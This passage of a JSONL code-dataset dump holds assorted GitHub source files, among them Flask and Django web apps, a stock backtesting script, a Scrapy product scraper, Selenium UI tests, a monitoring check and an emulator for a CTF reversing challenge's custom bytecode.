{%s} seconds and the json file is {%s} kb long\",\n func.__name__,\n kwargs,\n str(total_time)[:5],\n response_size / 8000,\n )\n return result\n\n return wrapper\n","repo_name":"Simple2B/TenKabel_be","sub_path":"app/utility/time_measurement.py","file_name":"time_measurement.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28953378080","text":"from .apis_common import api\nimport requests\nimport logging\n\n\napi_plugin = api('Template API')\napi_plugin.set_rooturl('https://myroute/')\n\n\ndef check_connection(timeout=10000):\n logging.info('testing connection to {}'.format(api_plugin.name))\n reponse = requests.get(api_plugin.rootUrl)\n if reponse.status_code == 200:\n return True\n else:\n return False\n\n\ndef set_nft_id(encoded_id):\n '''\n sets the extra url parameters need for the request\n logging.info('Setting NFT to search to {0}'.format(api_plugin.name + api_plugin.parameter))\n api_plugin.parameter = encoded_id\n '''\n\n\ndef get_raw():\n # This pulls te raw json fro the request no need to change\n logging.info('get raw data from {0}'.format(api_plugin.name + api_plugin.parameter))\n response = 
requests.get(api_plugin.rootUrl + api_plugin.parameter)\n if response.status_code == 200:\n return True, response.json()\n else:\n return False, None\n\n\ndef get_owner():\n try:\n status, raw_json = get_raw()\n if status is True:\n '''\n change how the json is parsed to recieve the encoded owner address ie XCH.......\n owner_data = raw_json['owner_address']\n return status, owner_data['encoded_id']\n '''\n else:\n logging.error('Unexpected responce from {0}'.format(api_plugin.name))\n return False, None\n\n except KeyError:\n logging.error('Data entries not found in responce from {0}'.format(api_plugin.name))\n return False, None\n","repo_name":"monkeyzoo-metaverse/token-gifting-system","sub_path":"token-gifting-system/nfttracking/apis/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"27213009943","text":"# -*-coding: utf-8 -*-\n# Python 3.6\n# Author:Zhang Haitao\n# Email:13163385579@163.com\n# TIME:2018-07-07 17:07\n# NAME:FT-main.py\n\n\n\nimport os\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n# from backtest.backtest_func import trade_date, backtest, buy_stocks_price, \\\n# sell_stocks_price, close_price_backtest\nfrom config import DIR_BACKTEST\n\nsns.set_style('white', {'axes.linewidth': 1.0, 'axes.edgecolor': '.8'})\nimport warnings\n\nwarnings.filterwarnings('ignore', category=FutureWarning)\nfrom collections import OrderedDict\nimport statsmodels.api as sm\n# import pyfolio as pf\nimport alphalens as alen\n\nimport sys\n\n# sys.path.append('./lib/')\n# from backtest.backtest_func import *\nfrom backtest.plot_performance import portfolio_performance,get_hedged_returns,plot_portfolio_performance,format_year_performance,format_hedged_year_performance\nimport backtest.base_func as bf\nglobal_settings = {'effective_number': 200,\n 'target_number': 100,\n 'transform_mode': 3, #等权重\n # 'decay_num': 1, #TODO: used to smooth the signal\n # 'delay_num': 1,\n 'hedged_period': 60, #trick: 股指的rebalance时间窗口,也可以考虑使用风险敞口大小来作为relance与否的依据\n 'buy_commission': 2e-3,\n 'sell_commission': 2e-3\n }\n\n\nzz500, = bf.read_trade_data('zz500', data_path=os.path.join(DIR_BACKTEST,'backtest_data.h5'))\n\nbenchmark_returns_zz500 = zz500.pct_change()\nbenchmark_returns_zz500.name = 'benchmark'\n\ndef quick(signal,fig_title,start=None, end=None):\n global global_settings\n hedged_period = global_settings['hedged_period']\n\n if not start:\n start=trade_date[0]\n if not end:\n end=trade_date[-1]\n\n if isinstance(start,int):\n start=str(start)\n if isinstance(end,int):\n end=str(end)\n\n date_range = trade_date[start: end]\n benchmark = zz500[start: end]\n\n trade_returns, turnover_rates, positions_record, shares_record, transactions_record = backtest(\n date_range, signal,\n global_settings['buy_commission'], global_settings['sell_commission'],\n global_settings['effective_number'], global_settings['target_number'],\n global_settings['transform_mode'])\n\n turnover_rates[0] = np.nan\n positions_record = pd.concat(positions_record, keys=date_range,\n names=['tradeDate'])\n shares_record = pd.concat(shares_record, keys=date_range,\n names=['tradeDate'])\n transactions_record = pd.concat(transactions_record,\n axis=1).stack().swaplevel().sort_index(\n level=0)\n\n # for quantopia format\n positions_record = positions_record.unstack()\n positions_record['cash'] = np.nan\n\n shares_record = shares_record.unstack()\n\n 
txn_date = transactions_record.index.get_level_values(0)\n txn_symbol = transactions_record.index.get_level_values(1)\n txn_amount = transactions_record.values\n txn_price = np.zeros(len(txn_date))\n for i in range(len(txn_date)):\n if txn_amount[i] >= 0:\n txn_price[i] = buy_stocks_price.loc[txn_date[i], txn_symbol[i]]\n else:\n txn_price[i] = sell_stocks_price.loc[txn_date[i], txn_symbol[i]]\n transactions_record = pd.DataFrame(\n {'amount': txn_amount, 'price': txn_price, 'symbol': txn_symbol},\n index=txn_date)\n\n perf = portfolio_performance(trade_returns, benchmark)\n hedged_returns = get_hedged_returns(trade_returns, benchmark, hedged_period)\n hedged_perf = portfolio_performance(hedged_returns, benchmark)\n fig=plot_portfolio_performance(trade_returns, turnover_rates, hedged_returns,\n benchmark, perf, hedged_perf, fig_title, fig_handler=True)\n # format_year_performance(trade_returns, benchmark, turnover_rates,\n # fig_title)\n\n # format_hedged_year_performance(hedged_returns, benchmark,\n # fig_title + '_hedged')\n\n results = OrderedDict({\n 'trade_returns': trade_returns,\n 'turnover_rates': turnover_rates,\n 'positions_record': positions_record,\n 'shares_record': shares_record,\n 'transactions_record': transactions_record,\n 'hedged_returns': hedged_returns,\n 'hedged_perf':hedged_perf\n })\n return results,fig\n\n\n#TODO: should provide several kinds of interfaces: 1. signal, 2. stocks,\n#TODO: measure the hedged return for each year separately; a real investment would never run for 5 years, so cumprod actually overstates the effect\n#TODO: calculate yearly return\n\n'''\nfor Y in [str(i) for i in range(2010,2019)]:\n print(Y,(1+df[Y]).cumprod().values[-1])\n'''","repo_name":"dxcv/FT","sub_path":"backtest/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"22212964304","text":"# Coded By Gowtham on 03/06/2020\n# Coded Using Visual Studio Code\n\nfrom flask import Flask, request, jsonify\nfrom BrainyQuotes import getQuotes\nfrom flask_cors import CORS\n\napp = Flask(__name__)\napp.secret_key = \"I_am_Marvelous (^_^)\"\nCORS(app)\n\n\n@app.route('/')\ndef home():\n return 'Quote API is UP!\r\n\r\n    A part of Alpha Projects'\n\n\n@app.route('/quotes')\ndef news():\n if request.method == 'GET':\n category = request.args.get('category')\n return jsonify(getQuotes(category))\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host='0.0.0.0', port=5000, use_reloader=True)\n","repo_name":"Gowtham2003/BrainyQuotesAPI","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"60"}
+{"seq_id":"22718261977","text":"from django.urls import path\n\nfrom common.views import (\n AboutUsListApiViews,\n ApplicationFormView,\n BannerApiView,\n BlogDetail,\n BlogList,\n BoardTextView,\n ContactFormView,\n ContactUsListApiView,\n SocialMediaList,\n TestimonialsListView,\n)\n\n\napp_name = \"common\"\nurlpatterns = [\n path(\"blogs/\", BlogList.as_view(), name=\"blog-list\"),\n path(\"blogs//\", BlogDetail.as_view(), name=\"blog-detail\"),\n path(\"banner/\", BannerApiView.as_view(), name=\"banner\"),\n path(\"application-form/\", ApplicationFormView.as_view(), name=\"application-form\"),\n path(\"about-us/\", AboutUsListApiViews.as_view(), name=\"about-us\"),\n path(\"contact/\", ContactUsListApiView.as_view(), name=\"contact-us\"),\n path(\"contact-form/\", ContactFormView.as_view(), name=\"contact-form\"),\n path(\"social-medias/\", SocialMediaList.as_view(), name=\"social-media-list\"),\n path(\"testimonials/\", TestimonialsListView.as_view(), name=\"testimonial-list\"),\n path(\"board/\", BoardTextView.as_view(), name=\"board\"),\n]\n","repo_name":"XudayberdiyevB/ecourseuz-api","sub_path":"common/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"}
+{"seq_id":"31768861198","text":"\nfrom selenium import webdriver\nfrom django.test import LiveServerTestCase, tag\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium_tests.selenium_test_base import SeleniumTestBase\n\n@tag('ui')\nclass TestChart(SeleniumTestBase):\n \"\"\" UI Tests for solenoid chart \"\"\"\n\n def __init__(self, methods):\n super().__init__(methods)\n\n def test_chart_is_rendered(self):\n \"\"\" Test that after clicking the graph button that the chart gets rendered. \"\"\"\n \n self.driver.find_element_by_xpath(\"//*[@id='calc-container']/button\").click()\n self.driver.find_element_by_xpath(\"//*[@id='graph-select']/button\").click()\n self.assertTrue(self.driver.find_element_by_id(\"chart-element\").is_enabled())\n\n def test_x_input_restricts_y(self):\n \"\"\" Test that selecting a value for x to graph restricts the user from selecting that value for y. 
\"\"\"\n\n display_none_style = \"display: none;\"\n x_values = [\"Voltage\", \"Length\", \"r0\", \"ra\", \"x\", \"Force\"]\n for x_value in x_values:\n self.driver.find_element_by_id(\"option-x-\" + x_value).click()\n # The following line is commented out because is_displayed was returning true?\n # self.assertFalse(self.driver.find_element_by_id(\"option-y-\" + x_value).is_displayed())\n style_attribute = self.driver.find_element_by_id(\"option-y-\" + x_value).get_attribute(\"style\")\n self.assertEqual(display_none_style, style_attribute)","repo_name":"solenoid-pdx/solenoid","sub_path":"selenium_tests/test_chart.py","file_name":"test_chart.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"33660541917","text":"import sys\n\nINSTR = [\n 'WIPE',\n 'NEGATE',\n 'SWAP',\n 'DEAL',\n 'DEALW',\n 'DRAW',\n 'DRAWW',\n 'JUMP',\n 'LOADI',\n 'LOADB',\n 'STOREB',\n 'COPY4',\n 'XOR',\n 'ADD',\n 'BEQ',\n 'HALT'\n]\n\n\nbinary = open('bmpx/chall.bmpx', 'rb')\n\n# Load into memory\nmemory = []\nbyte = binary.read(1)\nwhile byte:\n memory.append(byte)\n byte = binary.read(1)\nmemptr = 0\nbinary.close()\n\ndef ReadBytes(n):\n global memptr, memory\n bs = b\"\".join([b for b in memory[memptr:memptr+n]])\n memptr += n\n return bs\n\ndef ReadBytesAt(n, at):\n global memory\n bs = b\"\".join([b for b in memory[at:at+n]])\n return bs\n\nmagic = ReadBytes(2)\nfsize = int.from_bytes(ReadBytes(4), byteorder=sys.byteorder)\nfexec = ReadBytes(4)\n\nif magic != b'BM' or fexec != b'EXEC':\n print('Magic bytes dont match with BMPX format.')\n exit()\n\ndataOffest = int.from_bytes(ReadBytes(4), byteorder=sys.byteorder)\nhsize = int.from_bytes(ReadBytes(4), byteorder=sys.byteorder)\nwidth = int.from_bytes(ReadBytes(4), byteorder=sys.byteorder)\nheight = int.from_bytes(ReadBytes(4), byteorder=sys.byteorder)\nhplanes = int.from_bytes(ReadBytes(2), byteorder=sys.byteorder)\nbpx = int.from_bytes(ReadBytes(2), byteorder=sys.byteorder)\nhcomp = int.from_bytes(ReadBytes(4), byteorder=sys.byteorder)\nisize = int.from_bytes(ReadBytes(4), byteorder=sys.byteorder)\nXpixelsPerM = int.from_bytes(ReadBytes(4), byteorder=sys.byteorder)\nYpixelsPerM = int.from_bytes(ReadBytes(4), byteorder=sys.byteorder)\ncolorsUsed = int.from_bytes(ReadBytes(4), byteorder=sys.byteorder)\ncolorsImportant = int.from_bytes(ReadBytes(4), byteorder=sys.byteorder)\n\nred = int.from_bytes(ReadBytes(1), byteorder=sys.byteorder)\ngreen = int.from_bytes(ReadBytes(1), byteorder=sys.byteorder)\nblue = int.from_bytes(ReadBytes(1), byteorder=sys.byteorder)\nclrrsrvd = int.from_bytes(ReadBytes(1), byteorder=sys.byteorder)\nred = int.from_bytes(ReadBytes(1), byteorder=sys.byteorder)\ngreen = int.from_bytes(ReadBytes(1), byteorder=sys.byteorder)\nblue = int.from_bytes(ReadBytes(1), byteorder=sys.byteorder)\nclrrsrvd = int.from_bytes(ReadBytes(1), byteorder=sys.byteorder)\n\nRIP = 29 # Instruction Register\nPS = 30 # Prime Sequence Register\nPR = 31 # Position Register\nregisters = [0] * 32\n\n# Initialize Registers\nregisters[RIP] = dataOffest\nregisters[PR] = dataOffest\nregisters[PS] = 0x05030201\n\nprint(f'Image Size: {width}x{height}')\nprint(f'Data Offset: {hex(dataOffest)}')\nprint('')\nprint(f'{hsize} {width} {height} {hplanes} {bpx} {hcomp} {isize} {XpixelsPerM} {YpixelsPerM} {colorsUsed} {colorsImportant} {red} {green} {blue} {clrrsrvd}')\n\nmemory[0x2E] = (2).to_bytes(1, 'little')\nmemory[0x1C] = (1).to_bytes(1, 'little')\nmemory[0x26] = (254).to_bytes(1, 
'little')\nmemory[0x2a] = (254).to_bytes(1, 'little')\n\ndef PrintRegisters():\n global memptr, registers, memory\n print(f'PS: {registers[PS]} RIP: {registers[RIP]} PR: {registers[PR]}')\n prtstr = ''\n for i in range(29):\n prtstr += f'R{i}: {registers[i]} '\n print(prtstr)\n\ndef PrintInstruction(binn):\n opcode = int(binn[0:4], 2)\n reg1 = int(binn[4:9], 2)\n\n sInstr = INSTR[opcode]\n \n\n if sInstr == 'DEAL' or sInstr == 'DEALW' or sInstr == 'WIPE' or sInstr == 'NEGATE' or sInstr == 'SWAP' or sInstr == 'DRAW' or sInstr == 'DRAWW' or sInstr == 'JUMP':\n reg = f'R{reg1}'\n if reg1 == RIP:\n reg = f'RIP'\n elif reg1 == PR:\n reg = f'PR'\n elif reg1 == PS:\n reg = f'PS'\n print(f'{INSTR[opcode]} {reg}\\t\\t\\t({binn})')\n elif sInstr == 'COPY4':\n reg2 = int(binn[9:14], 2)\n regA = f'R{reg1}'\n if reg1 == RIP:\n regA = f'RIP'\n elif reg1 == PR:\n regA = f'PR'\n elif reg1 == PS:\n regA = f'PS'\n\n regB = f'R{reg2}'\n if reg2 == RIP:\n regB = f'RIP'\n elif reg2 == PR:\n regB = f'PR'\n elif reg2 == PS:\n regB = f'PS'\n\n b1 = int(binn[14])\n b2 = int(binn[15])\n b3 = int(binn[16])\n b4 = int(binn[17])\n\n print(f'{INSTR[opcode]} {regA} {regB} {b1}{b2}{b3}{b4}\\t\\t({binn})')\n elif sInstr == 'LOADI':\n imm = int(binn[9:25], 2)\n regA = f'R{reg1}'\n if reg1 == RIP:\n regA = f'RIP'\n elif reg1 == PR:\n regA = f'PR'\n elif reg1 == PS:\n regA = f'PS'\n\n print(f'{INSTR[opcode]} {regA} {imm}\\t\\t\\t({binn})')\n elif sInstr == 'XOR' or sInstr == 'ADD':\n reg2 = int(binn[9:14], 2)\n reg3 = int(binn[14:19], 2)\n\n regA = f'R{reg1}'\n if reg1 == RIP:\n regA = f'RIP'\n elif reg1 == PR:\n regA = f'PR'\n elif reg1 == PS:\n regA = f'PS'\n\n regB = f'R{reg2}'\n if reg2 == RIP:\n regB = f'RIP'\n elif reg2 == PR:\n regB = f'PR'\n elif reg2 == PS:\n regB = f'PS'\n\n regC = f'R{reg3}'\n if reg3 == RIP:\n regC = f'RIP'\n elif reg3 == PR:\n regC = f'PR'\n elif reg3 == PS:\n regC = f'PS'\n\n print(f'{INSTR[opcode]} {regA} {regB} {regC}\\t\\t\\t({binn})')\n elif sInstr == 'HALT':\n print(f'{INSTR[opcode]}\\t\\t\\t\\t({binn}')\n elif sInstr == 'LOADB' or sInstr == 'STOREB':\n reg2 = int(binn[9:14], 2)\n imm = int(binn[9:25], 2)\n\n regA = f'R{reg1}'\n if reg1 == RIP:\n regA = f'RIP'\n elif reg1 == PR:\n regA = f'PR'\n elif reg1 == PS:\n regA = f'PS'\n\n regB = f'R{reg2}'\n if reg2 == RIP:\n regB = f'RIP'\n elif reg2 == PR:\n regB = f'PR'\n elif reg2 == PS:\n regB = f'PS'\n\n print(f'{INSTR[opcode]} {regA} {regB} {imm}\\t\\t({binn})')\n else:\n print(sInstr + ' ' + binn)\n\ndef Disassemble():\n global memptr, registers, memory\n print('--- Disassembly ---')\n memptr = dataOffest\n isRunning = True\n counter = dataOffest\n while isRunning:\n binn = bin(int.from_bytes(ReadBytes(4), byteorder='big'))[2:].zfill(32)\n \n PrintInstruction(binn)\n counter += 4\n if counter > len(memory):\n isRunning = False\n\n PrintRegisters()\n\ndef Step():\n global memptr, registers, memory\n memptr = registers[RIP]\n binn = bin(int.from_bytes(ReadBytes(4), byteorder='big'))[2:].zfill(32)\n opcode = int(binn[0:4], 2)\n reg1 = int(binn[4:9], 2)\n\n sInstr = INSTR[opcode]\n\n if sInstr != 'JUMP':\n registers[RIP] = registers[RIP] + 4\n\n PrintInstruction(binn)\n if sInstr == 'COPY4':\n reg1 = int(binn[4:9], 2)\n reg2 = int(binn[9:14], 2)\n mask = int(binn[14:18], 2)\n \n registers[reg1] = (registers[reg1] & (~(1 << 0))) | (registers[reg2] & 1)\n registers[reg1] = (registers[reg1] & (~(1 << 1))) | (registers[reg2] & 2)\n registers[reg1] = (registers[reg1] & (~(1 << 2))) | (registers[reg2] & 4)\n registers[reg1] = (registers[reg1] & (~(1 
<< 3))) | (registers[reg2] & 10)\n\n\n elif sInstr == 'LOADI':\n reg1 = int(binn[4:9], 2)\n imm = int(binn[9:25], 2)\n registers[reg1] = (registers[reg1] & (0xFFFF0000)) | imm\n elif sInstr == 'ADD':\n reg1 = int(binn[4:9], 2)\n reg2 = int(binn[9:14], 2)\n reg3 = int(binn[14:19], 2)\n\n registers[reg3] = registers[reg1] + registers[reg2]\n elif sInstr == 'NEGATE':\n registers[reg1] = -1 * registers[reg1]\n elif sInstr == 'DRAWW':\n reg1 = int(binn[4:9], 2)\n\n registers[reg1] = int.from_bytes(ReadBytesAt(4, registers[PR]), byteorder='big')\n del(memory[registers[PR]])\n del(memory[registers[PR]])\n del(memory[registers[PR]])\n del(memory[registers[PR]])\n\n # Unchanged\n registers[PR] = registers[PR]\n registers[RIP] = registers[RIP]\n elif sInstr == 'DRAW':\n reg1 = int(binn[4:9], 2)\n\n registers[reg1] = ((registers[reg1] << 8) & 0xFFFFFFFF) | int.from_bytes(ReadBytesAt(1, registers[PR]), byteorder='big')\n del(memory[registers[PR]])\n\n\n # Unchanged\n registers[PR] = registers[PR]\n registers[RIP] = registers[RIP]\n elif sInstr == 'DEAL':\n reg1 = int(binn[4:9], 2)\n memory.insert(registers[PR], 0)\n val = registers[reg1] >> 24\n memory[registers[PR]] = val.to_bytes(1, 'big')\n\n if registers[RIP] > registers[PR]:\n registers[RIP] = registers[RIP] + 1\n registers[PR] = registers[PR] + 1\n registers[reg1] = (registers[reg1] << 8) & 0xFFFFFFFF\n elif sInstr == 'DEALW':\n reg1 = int(binn[4:9], 2)\n\n if registers[reg1] < 0:\n registers[reg1] = registers[reg1] & 0xFFFFFFFF\n\n memory.insert(registers[PR], 0)\n memory.insert(registers[PR], 0)\n memory.insert(registers[PR], 0)\n memory.insert(registers[PR], 0)\n\n\n val = (registers[reg1] >> 0) & 0xFF\n memory[registers[PR] + 3] = val.to_bytes(1, 'big')\n val = (registers[reg1] >> 8) & 0xFF\n memory[registers[PR] + 2] = val.to_bytes(1, 'big')\n val = (registers[reg1] >> 16) & 0xFF\n memory[registers[PR] + 1] = val.to_bytes(1, 'big')\n val = (registers[reg1] >> 24) & 0xFF\n memory[registers[PR] + 0] = val.to_bytes(1, 'big')\n\n if registers[RIP] > registers[PR]:\n registers[RIP] = registers[RIP] + 4\n registers[PR] = registers[PR] + 4\n registers[reg1] = 0\n elif sInstr == 'LOADB':\n reg1 = int(binn[4:9], 2)\n reg2 = int(binn[9:14], 2)\n imm = int(binn[14:30], 2)\n\n registers[reg1] = (registers[reg1] & 0xFFFFFF00) | int.from_bytes(ReadBytesAt(1, registers[reg2] + imm), byteorder='big')\n\n elif sInstr == 'JUMP':\n reg1 = int(binn[4:9], 2)\n registers[RIP] = registers[reg1]\n elif sInstr == 'WIPE':\n reg1 = int(binn[4:9], 2)\n val = 0\n registers[reg1] = val.to_bytes(1, 'big')\n elif sInstr == 'XOR':\n reg1 = int(binn[4:9], 2)\n reg2 = int(binn[9:14], 2)\n reg3 = int(binn[14:19], 2)\n\n registers[reg3] = registers[reg1] ^ registers[reg2]\n elif sInstr == 'SWAP':\n reg1 = int(binn[4:9], 2)\n\n most = registers[reg1] >> 24\n least = registers[reg1] & 0xFF\n\n registers[reg1] = (registers[reg1] & 0xFFFFFF00) | most\n registers[reg1] = (registers[reg1] & 0x00FFFFFF) | least\n\n elif sInstr == 'HALT':\n print('----------\\nProgram Exited\\n----------')\n return -1\n else:\n print('UNKNOWN INSTRUCTION')\n print(sInstr)\n\n\n PrintRegisters()\n return 0\n\n\nwhile True:\n print('D (Disassemble), S (Step), E (Exit)')\n inp = input()\n if inp == 'd':\n Disassemble()\n elif inp == 's':\n if Step() == -1:\n break\n elif inp == 'e':\n break\n\nwhile True:\n if Step() == -1:\n break\n\nout = open('bmpx/solve.bmpx', 'wb+')\nfor i in range(len(memory)):\n 
out.write(memory[i])","repo_name":"verd1c/ctf-writeups","sub_path":"UMD/2022/reverse/bmpv-love-letter/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":10951,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"60"} +{"seq_id":"10324552418","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Board',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=50)),\n ('participants', models.ManyToManyField(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'Board',\n 'verbose_name_plural': 'Boards',\n },\n ),\n migrations.CreateModel(\n name='List',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=40)),\n ('board', models.ForeignKey(to='test_app.Board')),\n ],\n options={\n 'verbose_name': 'List',\n 'verbose_name_plural': 'Lists',\n },\n ),\n migrations.CreateModel(\n name='Task',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=50)),\n ('body', models.TextField()),\n ],\n ),\n ]\n","repo_name":"D3f0/django_pg_notify","sub_path":"test_project/test_app/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"20041572171","text":"# -*- coding: utf-8 -*-\nfrom urlparse import urljoin\nimport datetime\nimport time\nimport logging\n\nimport scrapy\nfrom scrapy import Request\nfrom scrapy.loader import ItemLoader\nfrom wanda.items import DetailsItem, AvailabilityItem, PriceItem\nfrom scrapy.exceptions import CloseSpider\nfrom scrapy.shell import open_in_browser as o\nfrom webbrowser import open as ol\nimport ujson\nimport ipdb\n\n\ndef browser(response):\n ol(response.url)\n\n\nPRICE_QUOTE = -1\nFACTORY_LEAD_TIME_DEFAULT = \"unknown\"\nFACTORY_LEAD_UOM_DEFAULT = \"unknown\"\nPACKAGE_DEFAULT = \"none\"\nPACKAGING_DEFUALT = \"none\"\nVERSION_DEFAULT = 'none'\nTYPE_DEFAULT = 'none'\nPART_DETAIL_DEFAULT = 'none'\nPRICE_TYPE_DEFAULT = 'default'\nQUANTITY_DEFAULT = '-1'\nPRICE_DEFAULT = '-1'\nSTOCK_DEFAULT = '0'\n\n\nclass ArrowSpider(scrapy.Spider):\n name = \"digikey\"\n site_name = \"digikey\"\n start_url = \"http://www.digikey.com/product-search/en\"\n base_url = \"https://www.digikey.com/\"\n drop_count_items = 142057\n processed_items = 0\n\n def start_requests(self):\n yield Request(self.start_url)\n\n def parse(self, response):\n links = response.xpath(\"//li/a[contains(@href,'product-search')]/@href\").extract()\n for link in links:\n yield Request(urljoin(self.base_url,link)+\"?pageSize=500\",self.parse_1)\n def parse_1(self,response):\n next = response.xpath(\"//a[@class='Next']/@href\").extract()\n if next:\n yield Request(urljoin(self.base_url,next[0]),self.parse_1)\n products = response.xpath(\"//td[@class='digikey-partnumber']/a/@href\").extract()\n for link in products:\n yield Request(urljoin(self.base_url,link),self.parse_item)\n\n def parse_item(self,response):\n i = DetailsItem()\n 
i['site_name'] = self.site_name\n i['site_url'] = self.base_url\n loader = ItemLoader(i,response=response)\n loader.add_xpath(\"site_part_id\",\"//meta[@itemprop='productID']/@content\")\n loader.add_xpath(\"manuf_part_id\",\"//meta[@itemprop='name']/@content\")\n loader.add_xpath(\"manuf_name\",\"//span[@itemprop='name']/text()\")\n loader.add_xpath(\"description\",\"//td[@itemprop='description']/text()\")\n loader.add_xpath(\"datasheet_link\",\"//a[@class='lnkDatasheet']/@href\")\n loader.add_xpath(\"image_url\",\"//a[@class='lnkProductPhoto']/@href\")\n loader.add_value(\"page_url\",response.url)\n loader.add_xpath(\"part_detail\",\"//td[@class='attributes-table-main']\")\n loader.add_xpath(\"packaging\",\"//th[contains(text(),'Packaging')]/following-sibling::td/text()\")\n loader.add_xpath(\"package\",\"//th[contains(text(),'Standard Package')]/following-sibling::td/text()\")\n loader.add_value(\"package\",PACKAGE_DEFAULT)\n loader.add_value(\"packaging\",PACKAGING_DEFUALT)\n loader.add_xpath(\"type\",\"//th[text()='Accessory Type']/following-sibling::td/text()\")\n loader.add_value(\"version\",VERSION_DEFAULT)\n loader.add_value(\"date_created\",self.timestamp())\n i=loader.load_item()\n\n prices = response.xpath(\"//table[@id='pricing']/tr[td and not(contains(.//text(),'Call'))]\")\n for price in prices:\n td = price.xpath(\"td\")\n if len(td)==3:\n pi = PriceItem()\n pi['site_name'] = self.site_name\n pi['site_part_id'] = i['site_part_id']\n pi['date_created'] = self.timestamp()\n pi['price_type'] = i['packaging']\n pi['quantity'] = td[0].xpath(\"text()\").extract()[0]\n pi['price'] = td[1].xpath(\"text()\").extract()[0]\n i['price_data'].append(pi)\n\n avail = AvailabilityItem()\n avail['site_name'] = self.site_name\n avail['site_part_id'] = i['site_part_id']\n avail['date_created'] = self.timestamp()\n loader = ItemLoader(avail,response=response)\n loader.add_xpath(\"stock\",\"//td[@id='quantityavailable']\",re='\":\\s([\\d|\\,]*)')\n loader.add_value(\"factory_leadtime\",FACTORY_LEAD_TIME_DEFAULT)\n loader.add_value(\"factory_lead_uom\",FACTORY_LEAD_UOM_DEFAULT)\n avail = loader.load_item()\n i['inventory_data'].append(avail)\n self.processed_items+=1\n if self.processed_items==self.drop_count_items:\n raise CloseSpider(\"Sample collected\")\n yield i\n\n\n def timestamp(self):\n return datetime.datetime.fromtimestamp(time.time()).strftime('%m/%d/%Y %H:%M:%S')","repo_name":"tmslav/project","sub_path":"wanda/spiders/digikey.py","file_name":"digikey.py","file_ext":"py","file_size_in_byte":4424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42004262780","text":"import json\nfrom flask import Flask, render_template, request, redirect, url_for, jsonify, flash\n\ndef best_news():\n tweets = []\n with open('static/best_news.json', 'r') as json_file:\n data = json.load(json_file)\n return data\n # tweets.append(json.loads(line))\n # print(json.loads(line))\n # return json.dumps([tweets])\n # return json.load(([json.loads(line) for line in open('static/best_news.json', 'r')]))\n\nprint(best_news())\n","repo_name":"MotazBellah/news_feed","sub_path":"t.py","file_name":"t.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"7233562117","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom ddm_moi.Accumulator import AccumulatorModelMOI\nfrom ddm_moi.ddm_2d import get_stim_urg\n\naccum = AccumulatorModelMOI(\n 
tvec=np.arange(0, 2, 0.05),\n grid_vec=np.arange(-3, 0, 0.025),\n sensitivity=30*0.2,\n)\n\nhdgs = np.array(np.linspace(-12, 12, 9)) # to plot a smooth fit\nhdgs = np.sin(np.deg2rad(hdgs))\n\n\naccum.bound = np.array([2, 2])\naccum.urgency = get_stim_urg(tvec=accum.tvec, moment=1)\naccum.set_drifts(list(hdgs))\naccum.dist()\nprint(accum.p_corr)\n\nplt.plot(accum.drift_rates[0])\nplt.show()\n\nplt.plot(accum.tvec, accum.rt_dist.T)\nplt.show()\n\naccum.bound = np.array([2, 2])\naccum.urgency = None\naccum.set_drifts(list(hdgs))\naccum.dist()\nprint(accum.p_corr)\n\nplt.plot(accum.tvec, accum.rt_dist.T)\nplt.show()\n","repo_name":"sjjerjian/pyDots3DMP","sub_path":"archive/urgency_testing_script.py","file_name":"urgency_testing_script.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74617523069","text":"import argparse\nimport os\n\nfrom maas_common import metric\nfrom maas_common import print_output\nfrom maas_common import status_err\nfrom maas_common import status_ok\n\n\ndef physical_interface_errors():\n vnet_devices = os.listdir('/sys/devices/virtual/net')\n vnet_devices.append('bonding_masters')\n totals = dict()\n totals['rx_errors'] = 0\n totals['tx_errors'] = 0\n for d in os.listdir('/sys/class/net'):\n if d not in vnet_devices:\n for e in 'rx_errors', 'tx_errors':\n filepath = '/sys/class/net/%s/statistics/%s' % (d, e)\n with open(filepath, 'r') as f:\n totals[e] += int(f.read())\n f.close()\n return totals\n\n\ndef get_softnet_stats():\n softnet_stats = dict()\n 